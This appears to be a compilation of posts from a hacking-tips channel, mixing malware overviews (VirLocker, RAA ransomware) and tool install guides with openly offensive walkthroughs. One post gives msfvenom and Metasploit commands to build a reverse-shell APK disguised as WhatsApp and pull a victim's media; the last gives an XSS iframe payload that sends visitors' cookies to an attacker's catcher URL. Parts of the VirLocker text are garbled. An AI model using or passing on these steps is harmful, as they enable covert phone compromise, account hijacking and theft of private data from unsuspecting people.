▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑The blackmailer virus VirLocker strikes again? How to prevent VirLocker virus (with recovery guide included)
#FastTips

1) VirLocker's polymorphic function

VirLocker's changeable capabilities make everyone a headache, researchers, victims, security companies, etc. Every time VirLocker adds itself to a file, in fact the file is different from other versions of itself in many ways. VirLocker can add "pseudo-code" to some parts of itself to make the files different. It can use different APIs in the main loader of the malware to avoid partial fingerprint recognition. It can use different XOR and ROL seeds to make the files available. The encrypted content of the executable file is completely different and so on. This level of polymorphism makes it very difficult to handle.Even when the decompression stub in each file is different, it is usually used to identify each variant, it only leaves behavior and heuristics as a feasible detection method.

2) if the payload stub can be different in each creation request, and the encryption code is always seeded differently, the embedded original file will of course always be different. It depends on the file it attacks, and the resource is just a small icon of the original file it attacks. This leaves very little suitable for testing.

3) The execution of VirLocker is by no means simple. Compared with the blackmailer virus scenario that we have seen in a single case, it truly reflects multiple types of protection. When the infection is executed, the FUD wrapper (which can be polymorphic in some respects itself) unpacks the first decryption function mixed with Base64 and XOR and is always seeded differently. This new decryption function then decrypts another new decryption function mixed with XOR/ROL and is always seeded differently.

E N J O Y ❤️👍🏻
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Recently we post some large wordlists but anyway this so helpful for you :
wordlistctl: large database of dictionaries [Dictionary Collection]
wordlistctl is a program that contains a large database of dictionaries :

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

wordlistctl is created by blackarch.org developers, web site: https://github.com/BlackArch/wordlistctl

How to install wordlistctl
Installing wordlistctl on Kali Linux:

1) sudo apt install python3-pip python3-libtorrent python3-coloredlogs

2) git clone https://github.com/BlackArch/wordlistctl

3) cd wordlistctl

4) Open the requirements.txt file

5) gedit requirements.txt
And remove the line from there

> libtorrent

Then continue:

6) sudo pip3 install -r requirements.txt

7) python3 ./wordlistctl.py

8) In BlackArch, this program is in the standard repository – install directly from there.

> sudo pacman -S wordlistctl

9) How to use wordlistctl

10) All dictionaries are divided into 5 categories:

username
password
hostname
filename
misc = other

11) To show all dictionaries, for example, in the password category:

> wordlistctl -F password
With the -S option, you can search by dictionary names, for example, search for ‘RU..

enjoy❤️👍🏻
@UndercodeTesting
git topic 2020✅
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

RDP HACKING FULL WITH PICTURES
E N J O Y ❤️👍🏻

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑doork is a open-source passive vulnerability auditor tool that automates the process of searching on Google information about specific website based on dorks.

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) git clone https://github.com/AeonDave/doork doork
doork works with Python version 2.6.x and 2.7.x on any platform. You have also to install

2) pip install beautifulsoup4

3) pip install requests

4) pip install Django

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑ANOTHER WHATSAPP HACKING -2020 UPDATED


QRLJacking or Quick Response Code Login Jacking is a simple social engineering attack vector capable of session hijacking affecting all applications that rely on the “Login with QR code” feature as a secure way to login into accounts. In a nutshell, the victim scans the attacker’s QR code which results in session hijacking.

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) Update Firefox browser to the latest version

2) Install the latest geckodriver from https://github.com/mozilla/geckodriver/releases and extract the file then do :

3) chmod +x geckodriver

4) sudo mv -f geckodriver /usr/local/share/geckodriver

5) sudo ln -s /usr/local/share/geckodriver /usr/local/bin/geckodriver

6) sudo ln -s /usr/local/share/geckodriver /usr/bin/geckodriver

7) Clone the repo with git clone https://github.com/OWASP/QRLJacking then do cd QRLJacking/QRLJacker

8) Install all the requirements with pip install -r requirements.txt

9) Now you can run the framework with python3 QrlJacker.py --help

🦑Tested by us on :

> Ubuntu lastest v

> Kali Linux lastest v

> parrot os lastest v

> fedora lastest v

🦑MORE TUTORIAL ABOUT IT :

https://www.owasp.org/index.php/QRLJacking

https://www.owasp.org/index.php/OWASP_QRLJacker

enjoy❤️👍🏻
@UndercodeTesting
git topic 2020✅
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 topic fuzzing payloads, web shells

SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more. The goal is to enable a security tester to pull this repository onto a new testing box and have access to every type of list that may be needed.

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

Kali Linux (Tool Page)

open terminal and type :

> apt -y install seclists

enjoy❤️👍🏻
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Full tutorial with pictures
enjoy❤️👍🏻

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Change PHP's default Fastcgi mode to ISAPI mode (only run in Windows environment)

1) Download the ZIP file package of PHP at http://www.php.net (note that the version should correspond)

2) Copy the php4isapi.dll in the sapi directory to the c:\php directory

3) Enter the virtual host "Website Management"-"Virtual Host" of the management platform--In the server settings, modify the PHP mapping to change the original:
.php,C:\PHP\php.exe,5,GET,HEAD,POST,TRACE|

4) Change Into:
.php,C:\PHP\php4isapi.dll,5,GET,HEAD,POST,TRACE|

(Required only for IIS 6) Open the IIS manager, click Web service extension, click the properties of php, "Required File"---Add in--Select "C:\PHP\php4isapi.dll", after confirming, PHP can call.

E N J O Y ❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑JavaScript email attachments may carry malicious code ?

< Recently there has been a ransomware program called RAA, which is written entirely in JavaScript and can lock user files by using a strong encryption program.

> Most malicious software in Windows is written in a compiled language such as C or C++ and spread in the form of executable files such as .exe or .dll. Other malware is written using command-line scripts, such as Windows batch or PowerShell.

> The malware on the client side is rarely written in web-related languages, such as JavaScript, which is mainly interpreted by the browser. But the built-in Script Host of Windows can also directly execute .js files.

> Attackers have only recently started using this technique. Last month, Microsoft warned that js attachments in malicious emails might carry viruses, and ESET’s Security Research Institute also warned that some js attachments might run Locky virus. But in both cases, JavaScript files are used as a downloader of malware. They download from other addresses and install traditional malware written in other languages by default. But RAA is different, this is malware written entirely in JavaScript.

> Experts technical support forum said that RAA relies on CryptoJS, a secure JavaScript library, to implement its encryption process. The implementation of encryption is very solid, using the AES-256 encryption algorithm.

> Once the file is encrypted, RAA will add .locked to the suffix of the original file name. Its encryption targets include: .doc, .xls, .rtf, .pdf, .dbf, .jpg, .dwg, .cdr, .psd, .cd, .mdb, .png, .lcd, .zip, .rar And .csv.

> According to the user's response, after being infected with RAA, messages in Russian will be randomly displayed, but even if it targets Russian computers, its proliferation is only a matter of time.

> It is very unusual to include JavaScript attachments in emails, so users should avoid opening such files even if they are contained in .zip archives. .js files are rarely used in other places except in websites and browsers.

ENJOY ❤️👍🏻
written by kEIVEN
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Hack WhatsApp using Meterpreter in parrot linux or Kali Linux.

open terminal and type :
1️⃣Let's create a payload virus :

1) msfvenom -p android/meterpreter/reversetcp lhost=(YOUR IP) lport=(YOUR PORT NUMBER) R > whatsapp.apk

2) msfconsole

3) use exploit/multi/handler

4) set payload android/meterpreter/reversetcp

5) set lhost (YOUR IP)

6) exploit

7) cd /

8) ls -l

now you have been connected to the phone, now you have to take the data of his WhatsApp from his phone, for which first you have to go to the root files of his phone, whose command is given :

9) cd sdcard

10) ls -l

2️⃣ After coming to the SD card, you will see the interface of some such applications where all the applications installed in his phone will be visible to everyone.

1) cd WhatsApp

2) ls -l

3) cd Media

4) ls -l

After coming inside WhatsApp, you will have some such files open in front of you, where you have to

go to the media folder.

5) cd WhatsApp \ Images

6) ls -l

(Like I will go to the image folder and download an image and show you the commands you will find)

> example download (YOUR FILE NAME)

7) file has been downloaded, this file will

come in the root folder in your Linux.

ENJOY ❤️👍🏻
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑ProxyBroker is an open source tool that asynchronously finds public proxies from multiple sources and concurrently checks them.

🦑FEATURES :

-Finds more than 7000 working proxies from ~50 sources.

-Support protocols: HTTP(S), SOCKS4/5. Also CONNECT method to ports 80 and 23 (SMTP).

-Proxies may be filtered by type, anonymity level, response time, country and status in DNSBL.

-Work as a proxy server that distributes incoming requests to external proxies. With automatic proxy rotation.

-All proxies are checked to support Cookies and Referer (and POST requests if required).

Automatically removes duplicate proxies.

-Is asynchronous.

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) To install last stable release from pypi:

$ pip install proxybroker

2) MANUAL INSTALL :

$ pip install -U git+https://github.com/constverum/ProxyBroker.git

3) Find and save to a file 10 US proxies (without a check):

$ proxybroker grab --countries US --limit 10 --outfile ./proxies.txt

4) Serve
Run a local proxy server that distributes incoming requests to a pool of found HTTP(S) proxies with the high level of anonymity:

$ proxybroker serve --host 127.0.0.1 --port 8888 --types HTTP HTTPS --lvl High

E N J O Y ❤️👍🏻
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑WEBSITE HACKING METHODE

1) Find a vulnerable site where you can post content. A message board is a good example. Remember, if the site is not vulnerable to a cross-site scripting attack, then this will not work.


2)
Go to create a post. You will need to type some special code into the "post" which will capture the data of all who click on it.
You'll want to test to see if the system filters out code. Post
<script>window.alert("test")</script>
If an alert box appears when you click on your post, then the site is vulnerable to attack.

3)
Create and upload your cookie catcher. The goal of this attack is to capture a user's cookies, which allows you access to their account for websites with vulnerable logins. You'll need a cookie catcher, which will capture your target's cookies and reroute them. Upload the catcher to a website you have access to and that supports PHP and is vulnerable to remote code execution via upload. An example cookie catcher code can be found in the sample section.

4) Post with your cookie catcher. Input a proper code into the post which will capture the cookies and sent them to your site. You will want to put in some text after the code to reduce suspicion and keep your post from being deleted.
An example code would look like
<iframe frameborder="0" height="0" width="0" src="javascript...:void(document.location='YOURURL/cookiecatcher.php?c=' document.cookie)></iframe>

Use the collected cookies. After this, you can use the cookie information, which should be saved to your website, for whatever purpose you need.

@UndercodeTesting
(source wiki)
enjoy
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁